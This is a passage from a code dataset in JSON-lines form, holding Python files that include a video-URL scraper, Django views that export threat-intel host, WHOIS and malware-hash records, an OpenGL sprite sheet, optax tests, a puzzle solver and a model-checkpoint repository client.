re.compile(r'src=\\\"([^\\\"]+)\\\"')\n m = pattern.findall(iframe_str)\n if m[0] is not None:\n yield response.follow(m[0], callback=self.parse_video_url)\n\n # 解析得到mp4 url\n def parse_video_url(self, response):\n body = response.text\n pattern = re.compile(r'file:\\s*\\\"([^\\\"]+)\\\"')\n m = pattern.findall(body)\n if m[0] is not None:\n with open('urls.text', 'a+') as f:\n f.writelines(m[0])\n self.log(m[0])\n","sub_path":"stramjav/stramjav/spiders/stream_spider.py","file_name":"stream_spider.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7637812","text":"from django.urls import path\nfrom . import views\n\napp_name = 'basicsite'\nurlpatterns = [\n path('', views.index, name='home'),\n path('for-sale/', views.sales_list, name='for_sale'),\n path('for-sale////', views.bike_detail, name='bike_detail'),\n path('hello', views.hello, name='hello')\n]\n\n","sub_path":"rayjays/basicsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"224461363","text":"import os\n\nimport numpy\n\nfrom grit.files.reads import Reads, MergedReads, determine_read_pair_params\nfrom grit.frag_len import build_normal_density\n\nclass ChIPSeqReads(Reads):\n def __repr__(self):\n paired = 'paired' if self.reads_are_paired else 'unpaired'\n return \"\" % (paired, self.frag_len)\n\n def build_unpaired_reads_fragment_coverage_array( \n self, chrm, start, stop, window_size=None ):\n if window_size == None:\n window_size = self.frag_len\n assert stop >= start\n full_region_len = stop - start + 1\n cvg = numpy.zeros(full_region_len)\n for rd, strand in self.iter_reads_and_strand(chrm, start, stop):\n if strand == '+': \n rd_start = rd.pos\n rd_stop = rd.pos + window_size\n elif strand == '-': \n rd_start = rd.aend - window_size\n rd_stop = rd.aend\n else:\n assert False\n cvg[max(0, rd_start-start):max(0, rd_stop-start)] += (\n 1.0/(rd_stop-rd_start+1))\n\n return cvg\n\n \n def init(self, \n reverse_read_strand=None, reads_are_stranded=None,\n pairs_are_opp_strand=None, reads_are_paired=None,\n frag_len_dist=None): \n assert self.is_indexed()\n\n #\"ChIPSeq.GM12878.CTCF.BSID-ENCBS195XMM.REPID-1_1.EXPID-ENCSR000DRZ.bam\"\n #data = os.path.basename(self.filename).split('.')\n #self.biosample = data[1] \n #self.factor = data[2]\n #self.bsid = data[3].split(\"-\")[1]\n #self.experiment_id = data[5].split(\"-\")[1]\n #self.repid = data[4].split(\"-\")[1]\n\n #self.id = \"%s.%s.%s\" % (self.factor, self.bsid, self.repid)\n \n reads_are_stranded = True\n \n if frag_len_dist == None:\n frag_len_dist = build_normal_density(\n fl_min=100, fl_max=200, mean=150, sd=25)\n self.frag_len_dist = frag_len_dist\n self.frag_len = int(frag_len_dist.mean_fragment_length())\n \n read_pair_params = determine_read_pair_params(self)\n \n # set whether the reads are paired or not\n if reads_are_paired in ('auto', None):\n if 'paired' in read_pair_params:\n reads_are_paired = True \n assert 'unpaired' in read_pair_params\n else:\n reads_are_paired = False\n \n if pairs_are_opp_strand in ('auto', None):\n if reads_are_paired or ('same_strand' in read_pair_params):\n pairs_are_opp_strand = False\n else:\n pairs_are_opp_strand = True\n \n reverse_read_strand = None\n \n Reads.init(self, reads_are_paired, pairs_are_opp_strand, \n reads_are_stranded, reverse_read_strand )\n\n # we save these for fast reloads\n self._init_kwargs = {\n 'reverse_read_strand': reverse_read_strand, \n 'reads_are_stranded': reads_are_stranded, \n 'pairs_are_opp_strand': pairs_are_opp_strand, \n 'reads_are_paired': reads_are_paired\n }\n \n return self\n\ndef get_chipseq_experiment(ENCODE_exp_ID):\n pass\n","sub_path":"pyTFbindtools/DNABindingProteins.py","file_name":"DNABindingProteins.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649915059","text":"#-*- coding:utf-8 -*-\n# author:29557\n# datetime:2019/2/12 10:24\n# software: PyCharm\n\nimport os\n\nfile_path = \"test.py\"\n(filepath, tempfilename) = os.path.split(file_path)\n(filename, extension) = os.path.splitext(tempfilename)\nprint(filepath,tempfilename)\nprint(filename, extension)","sub_path":"test/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230101143","text":"import csv\nimport json\nimport datetime\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\nfrom .forms import SubmissionForm\nfrom .models import IndicatorRecord, TaskTracker\nfrom core.utilities import time_jump\n\nfrom celery.result import GroupResult\nfrom braces.views import LoginRequiredMixin\n\n\nclass PivotManager(LoginRequiredMixin, View):\n\n login_url = \"login\"\n redirect_unauthenticated_users = True\n\n template_name = 'pivoteer/pivoteer.html'\n\n def __init__(self):\n self.template_vars = {'SubmissionForm': SubmissionForm}\n\n def get(self, request):\n return render(request, self.template_name, self.template_vars)\n\n def post(self, request):\n\n task_tracking = {}\n submitted_form = SubmissionForm(request.POST)\n current_time = datetime.datetime.utcnow()\n desired_time = time_jump(hours=-24)\n\n if submitted_form.is_valid():\n recent_tasks = submitted_form.check_recent_tasks(desired_time)\n\n # If a recent task exists, use that one instead\n if recent_tasks:\n task_tracking['id'] = recent_tasks.group_id\n else:\n new_task = submitted_form.create_new_task(current_time)\n\n if new_task:\n task_tracking['id'] = new_task.id\n else:\n task_tracking[\"errors\"] = \"Unexpected Failure\"\n\n else: # pass form errors back to user from async request\n task_tracking[\"errors\"] = submitted_form.errors\n\n json_response = json.dumps(task_tracking)\n return HttpResponse(json_response, content_type=\"application/json\")\n\n\n# Check if task completed\n# https://zapier.com/blog/async-celery-example-why-and-how/\nclass CheckTask(LoginRequiredMixin, View):\n\n login_url = \"login\"\n redirect_unauthenticated_users = True\n\n template_name = \"pivoteer/UnknownRecords.html\"\n\n def __init__(self):\n self.template_vars = {}\n\n def post(self, request):\n\n task = request.POST['task_id']\n res = GroupResult.restore(task)\n\n if res and not res.ready():\n return HttpResponse(json.dumps({\"status\": \"loading\"}), content_type=\"application/json\")\n\n # Task completion allows for origin information to be pulled\n try:\n task_origin = TaskTracker.objects.get(group_id=task)\n record_type = task_origin.type\n indicator = task_origin.keyword\n\n except MultipleObjectsReturned:\n task_origin = TaskTracker.objects.filter(group_id=task).latest('date')\n record_type = task_origin.type\n indicator = task_origin.keyword\n\n except ObjectDoesNotExist:\n record_type = None\n indicator = None\n\n # Pull data according to the record type\n if record_type == \"Recent\":\n\n self.template_name = \"pivoteer/RecentRecords.html\"\n\n # Current hosting records\n host_record = IndicatorRecord.objects.recent_hosts(indicator)\n self.template_vars[\"current_hosts\"] = host_record\n\n # Current WHOIS record\n whois_record = IndicatorRecord.objects.recent_whois(indicator)\n self.template_vars[\"current_whois\"] = whois_record\n\n elif record_type == \"Historical\":\n\n self.template_name = \"pivoteer/HistoricalRecords.html\"\n\n # Historical hosting records\n host_records = IndicatorRecord.objects.historical_hosts(indicator, request)\n self.template_vars[\"hosting_records\"] = host_records\n\n # Historical WHOIS records\n whois_record = IndicatorRecord.objects.historical_whois(indicator)\n self.template_vars[\"historical_whois\"] = whois_record\n\n elif record_type == \"Malware\":\n\n self.template_name = \"pivoteer/MalwareRecords.html\"\n\n malware_records = IndicatorRecord.objects.malware_records(indicator)\n self.template_vars[\"malware_records\"] = malware_records\n\n self.template_vars[\"origin\"] = indicator\n return render(request, self.template_name, self.template_vars)\n\n\nclass ExportRecords(LoginRequiredMixin, View):\n\n login_url = \"login\"\n redirect_unauthenticated_users = True\n\n def __init__(self):\n\n # Create the HttpResponse object with the appropriate CSV header.\n self.response = HttpResponse(content_type='text/csv')\n self.response['Content-Disposition'] = 'attachment; filename=\"exported_records.csv\"'\n self.writer = csv.writer(self.response)\n\n def get(self, request):\n indicator = request.GET.get('indicator', '')\n filtering = request.GET.get('filter', '')\n\n if indicator and filtering == '':\n self.export_recent(indicator)\n self.export_historical(indicator, request)\n self.export_malware(indicator)\n\n elif indicator and filtering == 'recent':\n self.export_recent(indicator)\n\n elif indicator and filtering == 'historical':\n self.export_historical(indicator, request)\n\n elif indicator and filtering == 'malware':\n self.export_malware(indicator)\n\n return self.response\n\n def export_recent(self, indicator):\n\n hosts = IndicatorRecord.objects.recent_hosts(indicator)\n whois = IndicatorRecord.objects.recent_whois(indicator)\n\n if hosts:\n self.line_separator()\n self.writer.writerow([\"Date\", \"Source\", \"IP\", \"Domain\", \"IP Location\"])\n\n for host in hosts:\n entry = [host.info_date, host.info_source,\n host.info['ip'], host.info['domain'], host.info['geo_location']]\n\n self.writer.writerow(entry)\n\n if whois:\n self.line_separator()\n self.writer.writerow([\"Lookup Date\", \"WHOIS Information\"])\n self.writer.writerow([whois['info_date'], whois['info']])\n\n def export_historical(self, indicator, request):\n\n hosts = IndicatorRecord.objects.historical_hosts(indicator, request)\n whois = IndicatorRecord.objects.historical_whois(indicator)\n\n if hosts:\n print(hosts)\n self.line_separator()\n self.writer.writerow([\"Date\", \"Source\", \"IP\", \"Domain\", \"IP Location\"])\n\n for host in hosts:\n entry = [host.info_date, host.info_source,\n host.info['ip'], host.info['domain'], host.info['geo_location']]\n\n self.writer.writerow(entry)\n\n if whois:\n self.line_separator()\n self.writer.writerow(['First Seen / Last Seen', 'WHOIS Information'])\n\n for record in whois:\n self.writer.writerow([str(record['earliest']) + \" / \" + str(record['latest']), record['info']])\n\n def export_malware(self, indicator):\n\n malware = IndicatorRecord.objects.malware_records(indicator)\n\n if malware:\n self.line_separator()\n self.writer.writerow([\"Date\", \"Source\", \"Indicator\", \"MD5\", \"SHA1\", \"SHA256\", \"Report Link\"])\n\n for record in malware:\n entry = [record.info_date, record.info_source, record.info['indicator'], record.info['md5'],\n record.info['sha1'], record.info['sha256'], record.info['link']]\n\n self.writer.writerow(entry)\n\n def line_separator(self):\n self.writer.writerow([])\n","sub_path":"pivoteer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"172859309","text":"from __future__ import absolute_import\n\nfrom django.conf import settings\nfrom django.utils import six\nfrom importlib import import_module\nfrom django import forms\n\n\ndef load_widget_classes(widgets):\n\n _widgets = []\n\n def get_class_from_string(widget):\n mod = '.'.join(widget.split('.')[0:-1])\n cls_name = widget.split('.')[-1]\n return mod, cls_name\n\n for widget in widgets:\n\n kwargs = {}\n\n # load class from strings\n if isinstance(widget, six.string_types):\n try:\n mod, cls_name = get_class_from_string(widget)\n WidgetCls = getattr(import_module(mod), cls_name)\n except Exception as e:\n raise e\n elif isinstance(widget, tuple):\n try:\n mod, cls_name = get_class_from_string(widget[0])\n if len(widget) > 1:\n kwargs.update(widget[1])\n WidgetCls = getattr(import_module(mod), cls_name)\n except Exception as e:\n raise Exception('%s: %s' % (mod, e))\n else:\n WidgetCls = widget\n\n _widgets.append(WidgetCls)\n\n return _widgets\n\n\ndef get_all_widget_classes():\n \"\"\"returns collected Leonardo Widgets\n\n if not declared in settings is used __subclasses__\n which not supports widget subclassing\n\n \"\"\"\n from leonardo.module.web.models import Widget\n _widgets = getattr(settings,\n 'WIDGETS', Widget.__subclasses__())\n widgets = []\n if isinstance(_widgets, dict):\n for group, widget_cls in six.iteritems(_widgets):\n widgets.extend(widget_cls)\n elif isinstance(_widgets, list):\n widgets = _widgets\n return load_widget_classes(widgets)\n\n\ndef get_grouped_widgets(feincms_object, request=None):\n '''returns tuple(choices, grouped, ungrouped)\n\n requires feincms_object for getting content types\n\n request optionaly for checking permissions, but not required\n\n grouped = {'web': (id, label, icon)}\n '''\n\n grouped = {}\n ungrouped = []\n choices = []\n\n for ct in feincms_object._feincms_content_types:\n # Skip cts that we shouldn't be adding anyway\n opts = ct._meta\n # check permissions\n if request and request.user:\n from django.contrib.auth import get_permission_codename\n perm = opts.app_label + \".\" + \\\n get_permission_codename('add', opts)\n if not request.user.has_perm(perm):\n continue\n\n ct_info = ('.'.join([ct._meta.app_label,\n ct.__name__.lower()]),\n ct._meta.verbose_name,\n ct.get_widget_icon)\n if hasattr(ct, 'optgroup'):\n if ct.optgroup in grouped:\n grouped[ct.optgroup].append(ct_info)\n else:\n grouped[ct.optgroup] = [ct_info]\n else:\n ungrouped.append(ct_info)\n choices.append(ct_info)\n\n return choices, grouped, ungrouped\n\n\ndef find_widget_class(name):\n\n for w_cls in get_all_widget_classes():\n if name.lower() in w_cls.__name__.lower():\n return w_cls\n return None\n\n\ndef get_htmltext_widget():\n '''Returns the default widget\n for html text fields\n '''\n\n return getattr(settings,\n 'LEONARDO_HTMLTEXT_WIDGET',\n forms.Textarea\n )\n","sub_path":"leonardo/utils/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"171028418","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.arrays import vbo\nimport numpy as np\nfrom HVertexData2D import HVertexData2D\nfrom HTexture import HTexture\n\nclass HSpriteSheet(HTexture):\n def __init__(self, *args, **kwargs):\n super().__init__()\n \n self.mVertexDataBuffer = None\n self.mIndexBuffers = None\n \n self.mClips = []\n \n def addClipSprite(self, newClip):\n self.mClips.append(newClip)\n return len(self.mClips) - 1\n \n def getClip(self, index):\n return self.mClips[index]\n \n def generateDataBuffer(self):\n if self.mTextureID != 0 and len(self.mClips) > 0:\n totalSprites = len(self.mClips)\n vertexData = []\n vertexDataBytes = b''\n for i in range(totalSprites * 4):\n vertexData.append(HVertexData2D())\n self.vertexDataSize = vertexData[0].size()\n self.vertexDataTexOffset = vertexData[0].texOffset()\n self.vertexDataPosOffset = vertexData[0].posOffset()\n \n self.mIndexBuffers = []\n spriteIndices = np.arange(4, dtype=GLuint)\n for i in range(totalSprites):\n if i != 0:\n spriteIndices += 4\n # Top left\n vertexData[ spriteIndices[ 0 ] ].position.x = -self.mClips[ i ].w / 2.\n vertexData[ spriteIndices[ 0 ] ].position.y = -self.mClips[ i ].h / 2.\n\n vertexData[ spriteIndices[ 0 ] ].texCoord.s = (self.mClips[ i ].x) / self.mTextureWidth\n vertexData[ spriteIndices[ 0 ] ].texCoord.t = (self.mClips[ i ].y) / self.mTextureHeight\n\n # Top right\n vertexData[ spriteIndices[ 1 ] ].position.x = self.mClips[ i ].w / 2.\n vertexData[ spriteIndices[ 1 ] ].position.y = -self.mClips[ i ].h / 2.\n\n vertexData[ spriteIndices[ 1 ] ].texCoord.s = (self.mClips[ i ].x + self.mClips[ i ].w) / self.mTextureWidth\n vertexData[ spriteIndices[ 1 ] ].texCoord.t = (self.mClips[ i ].y) / self.mTextureHeight\n\n # Bottom right\n vertexData[ spriteIndices[ 2 ] ].position.x = self.mClips[ i ].w / 2.\n vertexData[ spriteIndices[ 2 ] ].position.y = self.mClips[ i ].h / 2.\n\n vertexData[ spriteIndices[ 2 ] ].texCoord.s = (self.mClips[ i ].x + self.mClips[ i ].w) / self.mTextureWidth\n vertexData[ spriteIndices[ 2 ] ].texCoord.t = (self.mClips[ i ].y + self.mClips[ i ].h) / self.mTextureHeight\n\n # Bottom left\n vertexData[ spriteIndices[ 3 ] ].position.x = -self.mClips[ i ].w / 2.\n vertexData[ spriteIndices[ 3 ] ].position.y = self.mClips[ i ].h / 2.\n\n vertexData[ spriteIndices[ 3 ] ].texCoord.s = (self.mClips[ i ].x) / self.mTextureWidth\n vertexData[ spriteIndices[ 3 ] ].texCoord.t = (self.mClips[ i ].y + self.mClips[ i ].h) / self.mTextureHeight\n \n for i in range(4):\n vertexDataBytes += vertexData[ spriteIndices[ i ] ].tostring()\n \n indexBuffer = vbo.VBO(data=spriteIndices.tostring(), usage='GL_STATIC_DRAW', target='GL_ELEMENT_ARRAY_BUFFER')\n self.mIndexBuffers.append(indexBuffer)\n \n self.mVertexDataBuffer = vbo.VBO(data=vertexDataBytes, usage='GL_STATIC_DRAW', target='GL_ARRAY_BUFFER')\n \n elif self.mTextureID == 0:\n print('No texture to render with!')\n return False\n elif len(self.mClips) <= 0:\n print('No clips to generate vertex data from!')\n return False\n return True\n \n def freeSheet(self):\n if self.mVertexDataBuffer is not None:\n self.mVertexDataBuffer.delete()\n self.mVertexDataBuffer = None\n \n if self.mIndexBuffers is not None:\n for buf in self.mIndexBuffer:\n buf.delete()\n self.mIndexBuffers = None\n \n self.mClips = []\n \n def freeTexture(self):\n self.freeSheet()\n super().freeTexture()\n \n def renderSprite(self, index):\n if self.mVertexDataBuffer is not None:\n glBindTexture(GL_TEXTURE_2D, self.mTextureID)\n glEnableClientState(GL_VERTEX_ARRAY)\n glEnableClientState(GL_TEXTURE_COORD_ARRAY)\n self.mVertexDataBuffer.bind()\n glTexCoordPointer(2, GL_FLOAT, self.vertexDataSize, self.mVertexDataBuffer + self.vertexDataTexOffset)\n glVertexPointer(2, GL_FLOAT, self.vertexDataSize, self.mVertexDataBuffer + self.vertexDataPosOffset)\n \n self.mIndexBuffers[index].bind()\n glDrawElements( GL_QUADS, 4, GL_UNSIGNED_INT, None )\n \n glDisableClientState( GL_TEXTURE_COORD_ARRAY )\n glDisableClientState( GL_VERTEX_ARRAY )","sub_path":"OpenGL/lazy_foo/Lesson 19/HSpriteSheet.py","file_name":"HSpriteSheet.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493118631","text":"# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for `utils.py`.\"\"\"\n\nfrom unittest import mock\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\nimport jax\n\nfrom optax._src import utils\n\n\nclass ScaleGradientTest(parameterized.TestCase):\n\n @parameterized.product(inputs=[-1., 0., 1.], scale=[-0.5, 0., 0.5, 1., 2.])\n @mock.patch.object(jax.lax, 'stop_gradient', wraps=jax.lax.stop_gradient)\n def test_scale_gradient(self, mock_sg, inputs, scale):\n\n def fn(inputs):\n outputs = utils.scale_gradient(inputs, scale)\n return outputs ** 2\n\n grad = jax.grad(fn)\n self.assertEqual(grad(inputs), 2 * inputs * scale)\n if scale == 0.:\n mock_sg.assert_called_once_with(inputs)\n else:\n self.assertFalse(mock_sg.called)\n self.assertEqual(fn(inputs), inputs ** 2)\n\n @parameterized.product(scale=[-0.5, 0., 0.5, 1., 2.])\n def test_scale_gradient_pytree(self, scale):\n\n def fn(inputs):\n outputs = utils.scale_gradient(inputs, scale)\n outputs = jax.tree_map(lambda x: x ** 2, outputs)\n return sum(jax.tree_leaves(outputs))\n\n inputs = dict(a=-1., b=dict(c=(2.,), d=0.))\n\n grad = jax.grad(fn)\n grads = grad(inputs)\n jax.tree_map(lambda i, g: self.assertEqual(g, 2 * i * scale), inputs, grads)\n self.assertEqual(\n fn(inputs), sum(jax.tree_leaves(jax.tree_map(lambda x: x**2, inputs))))\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"optax/_src/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"465597750","text":"from pbge import Singleton\nimport color\n\nclass AegisOverlord(Singleton):\n\tname = \"Aegis Overlord Luna\"\n\tmecha_colors = (color.LunarGrey,color.AegisCrimson,color.LemonYellow,color.CeramicColor,color.LunarGrey)\n\nclass BladesOfCrihna(Singleton):\n\tname = \"the Blades of Crihna\"\n\tmecha_colors = (color.HeavyPurple,color.SeaGreen,color.PirateSunrise,color.Black,color.StarViolet)\n\nclass BoneDevils(Singleton):\n\tname = \"the Bone Devil Gang\"\n\tmecha_colors = (color.Black,color.Cream,color.BrightRed,color.Avocado,color.Terracotta)\n\nclass TerranDefenseForce(Singleton):\n\tname = \"the Terran Defense Force\"\n\tmecha_colors = (color.ArmyDrab,color.Olive,color.ElectricYellow,color.GullGrey,color.Terracotta)\n","sub_path":"gears/factions.py","file_name":"factions.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282246840","text":"from copy import copy\n\n\ndef puzzle_solver(a, b, aplusb, max_letters = None):\n \"\"\"Max letter is range of numbers you want to use\n eq. to solve some + more = money you need range of 10\n \"\"\"\n letters = set().union(a, b, aplusb)\n letters = list(letters)\n # print(letters, len(letters))\n if max_letters is not None:\n for _ in range(10 - max_letters):\n # adds letters to ocupy free space\n letters.append(' ')\n\n def make_val(word, comb):\n \"\"\"Makes a number from letters with given values\"\"\"\n val = 0\n for index, letter in enumerate(word[::-1]):\n if letter != ' ':\n val += comb.find(letter) * 10 ** index\n return val\n\n def check(comb):\n \"\"\"Checks if combination makes its job\"\"\"\n a_val = make_val(a, comb)\n b_val = make_val(b, comb)\n aplusb_val = make_val(aplusb, comb)\n return a_val + b_val == aplusb_val\n\n def gen_perms(k, S, U):\n \"\"\"Generates every possible permutation without repetiton\"\"\"\n\n for e in U:\n new_U = copy(U)\n new_U.remove(e)\n yield from gen_perms(k-1, S + e, new_U)\n\n if k == 0: # ok. no more letters\n if check(S):\n # combination S is valid\n yield S # solution found\n # # l\n # def gen_perms2(k, S, U):\n # \"\"\"Generates every possible permutation without repetiton\"\"\"\n #\n # for e in copy(U):\n # U.remove(e)\n # if k == 0: # ok. no more letters\n # if check(S):\n # # combination S is valid\n # yield S # solution found\n # else:\n # yield from gen_perms(k - 1, S + e, U)\n\n\n\n\n # it start here\n return gen_perms(len(letters), '', set(letters))\n\n\nif __name__ == '__main__':\n p = []\n counter = 1\n # for answer in puzzle_solver('send', 'more', 'money'):\n for answer in puzzle_solver('cat', 'dog', 'pig'):\n if answer not in p:\n print('{0:<3}'.format(counter), answer)\n counter += 1\n p.append(answer)\n\n\n\n","sub_path":"chapter4/puzzlesolver.py","file_name":"puzzlesolver.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"245820482","text":"from docx import Document\n\ndocument = Document('header.docx')\ndocument.add_page_break()\n\ndef Make_Table(rows_number):\n table = document.add_table(cols=1, rows=rows_number, style='Table Grid')\n for i in range(0,rows_number):\n cell = table.cell(i,0)\n cell.text = \"Hi\"\n i += 1\n document.save(\"Nessus-result.docx\")\nMake_Table(7)\n","sub_path":"Project/Ozuma_Nessus/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"441898168","text":"import sys\nsys.path.append('/home/danielle8farias/hello-world-python3/meus_modulos')\nfrom mensagem import ler_cabecalho\nfrom numeros import ler_num_int\n\nfrom equacoes_polinomiais.raizes_equacao_2_grau import equacao_seg_grau\nfrom equacoes_polinomiais.determina_equacao_2_grau import raizes\n\n\ndef equacoes():\n ler_cabecalho('equação do 2º grau')\n print('''\n 0- sair\n 1- determinar raízes de uma equação do 2º grau\n 2- determinar a equação do 2º grau\n ''')\n opcao = ler_num_int('Escolha uma das opções: ')\n print()\n if opcao == 1:\n equacao_seg_grau()\n elif opcao == 2:\n raizes()\n else:\n pass\n","sub_path":"calculadora_py/equacoes_polinomiais/main_equacao_2_grau.py","file_name":"main_equacao_2_grau.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195045791","text":"import logging\nimport uuid\nimport os\nfrom urllib.parse import urlencode\n\nfrom .. import entities, repositories, exceptions, miscellaneous\n\nlogger = logging.getLogger(name=__name__)\n\n\nclass Checkpoints:\n \"\"\"\n Checkpoints Repository\n \"\"\"\n\n def __init__(self, client_api, model=None, project=None, artifacts=None):\n self._client_api = client_api\n self._project = project\n self._model = model\n self._artifacts = artifacts\n\n ############\n # entities #\n ############\n ############\n @property\n def project(self):\n if self._project is None:\n try:\n self._project = repositories.Projects(client_api=self._client_api).get()\n except exceptions.NotFound:\n raise exceptions.PlatformException(\n error='2001',\n message='Missing \"project\". need to set a Project entity or use project.checkpoints repository')\n return self._project\n\n @project.setter\n def project(self, project):\n if not isinstance(project, entities.Project):\n raise ValueError('Must input a valid Project entity')\n self._project = project\n\n @property\n def artifacts(self):\n if self._artifacts is None:\n try:\n self._artifacts = repositories.Artifacts(client_api=self._client_api,\n project=self._project)\n except exceptions.NotFound:\n raise exceptions.PlatformException(\n error='2001',\n message='Missing \"artifacts\"')\n return self._artifacts\n\n @property\n def model(self):\n assert isinstance(self._model, entities.Model)\n return self._model\n\n ###########\n # methods #\n ###########\n def get(self, checkpoint_name=None, checkpoint_id=None):\n \"\"\"\n Get checkpoint object\n\n :param checkpoint_id:\n :param checkpoint_name:\n :return: checkpoint object\n \"\"\"\n\n if checkpoint_id is not None:\n success, response = self._client_api.gen_request(req_type=\"get\",\n path=\"/checkpoints/{}\".format(checkpoint_id))\n if not success:\n raise exceptions.PlatformException(response)\n checkpoint = entities.Checkpoint.from_json(client_api=self._client_api,\n _json=response.json(),\n project=self._project,\n model=self.model)\n elif checkpoint_name is not None:\n checkpoints = self.list(checkpoint_name=checkpoint_name)\n if len(checkpoints) == 0:\n raise exceptions.PlatformException(\n error='404',\n message='Checkpoint not found. Name: {}'.format(checkpoint_name))\n elif len(checkpoints) > 1:\n raise exceptions.PlatformException(\n error='400',\n message='More than one file found by the name of: {}'.format(checkpoint_name))\n checkpoint = checkpoints[0]\n else:\n raise exceptions.PlatformException(\n error='400',\n message='Checked out not found, must provide either checkpoint id or checkpoint name')\n\n return checkpoint\n\n def list(self, model_id=None, creator=None, checkpoint_name=None):\n \"\"\"\n List project checkpoints\n :return:\n \"\"\"\n url = '/checkpoints'\n query_params = {\n 'modelId': model_id,\n 'creator': creator,\n 'name': checkpoint_name\n }\n\n if self._project is not None:\n query_params['projects'] = self._project.id\n\n url += '?{}'.format(urlencode({key: val for key, val in query_params.items() if val is not None}, doseq=True))\n\n # request\n success, response = self._client_api.gen_request(req_type='get',\n path=url)\n if not success:\n raise exceptions.PlatformException(response)\n\n # return checkpoints list\n checkpoints = miscellaneous.List()\n for checkpoint in response.json()['items']:\n checkpoints.append(entities.Checkpoint.from_json(client_api=self._client_api,\n _json=checkpoint,\n project=self._project,\n model=self.model))\n return checkpoints\n\n def upload(self, checkpoint_name, local_path, description=None, project_id=None, scope='private'):\n \"\"\"\n Create a checkpoint in platform\n\n :param local_path: path of artifacts to upload\n :param checkpoint_name:\n :param description:\n :param project_id:\n :param scope: 'global'\n :return: Checkpoint Entity\n \"\"\"\n if project_id is None:\n project_id = self.project.id\n\n # upload artifacts\n artifacts = self.artifacts.upload(filepath=local_path,\n model_name=self.model.name,\n checkpoint_name='{}_{}'.format(checkpoint_name, str(uuid.uuid1())))\n # get dir item of the artifacts\n if isinstance(artifacts, list):\n if len(artifacts) == 0:\n raise ValueError('nothing uploaded')\n item = artifacts[0]\n elif isinstance(artifacts, entities.Item):\n item = artifacts\n else:\n raise ValueError('bad upload')\n filters = entities.Filters(field='filename', values=item.dir)\n filters.recursive = False\n filters.show_dirs = True\n pages = self.artifacts.dataset.items.list(filters=filters)\n if pages.items_count != 1:\n raise ValueError('cant find dir of artifacts item. received items count: {}'.format(pages.items_count))\n artifact_id = pages.items[0].id\n\n # create payload for request\n payload = {'name': checkpoint_name,\n 'description': description,\n 'modelId': self.model.id,\n 'projectId': project_id,\n 'artifactId': artifact_id,\n 'scope': scope}\n\n # request\n success, response = self._client_api.gen_request(req_type='post',\n path='/checkpoints',\n json_req=payload)\n\n # exception handling\n if not success:\n raise exceptions.PlatformException(response)\n\n checkpoint = entities.Checkpoint.from_json(_json=response.json(),\n client_api=self._client_api,\n project=self._project,\n model=self.model)\n return checkpoint\n\n def download(self, checkpoint_id=None, checkpoint=None, local_path=None):\n if checkpoint is None:\n if checkpoint_id is None:\n raise exceptions.PlatformException('400', 'Please provide checkpoint or checkpoint id')\n checkpoint = self.get(checkpoint_id=checkpoint_id)\n\n if local_path is None:\n local_path = os.getcwd()\n\n checkpoint_artifact_item = self.artifacts.get(artifact_id=checkpoint.artifacts_id)\n if checkpoint_artifact_item.type == 'dir':\n filters = entities.Filters(field='dir', values='{}*'.format(checkpoint_artifact_item.filename))\n artifacts = self.artifacts.items_repository.download(filters=filters,\n local_path=local_path,\n to_items_folder=False,\n without_relative_path=checkpoint_artifact_item.filename)\n else:\n artifacts = checkpoint_artifact_item.download(local_path=local_path)\n return artifacts\n\n def delete(self, checkpoint=None, checkpoint_name=None, checkpoint_id=None):\n \"\"\"\n Delete Checkpoint object\n\n :param checkpoint:\n :param checkpoint_name:\n :param checkpoint_id:\n :return: True\n \"\"\"\n # get id and name\n if checkpoint is None:\n checkpoint = self.get(checkpoint_id=checkpoint_id, checkpoint_name=checkpoint_name)\n try:\n self.artifacts.items_repository.delete(item_id=checkpoint.artifacts_id)\n except exceptions.NotFound:\n pass\n\n # request\n success, response = self._client_api.gen_request(\n req_type=\"delete\",\n path=\"/checkpoints/{}\".format(checkpoint.id)\n 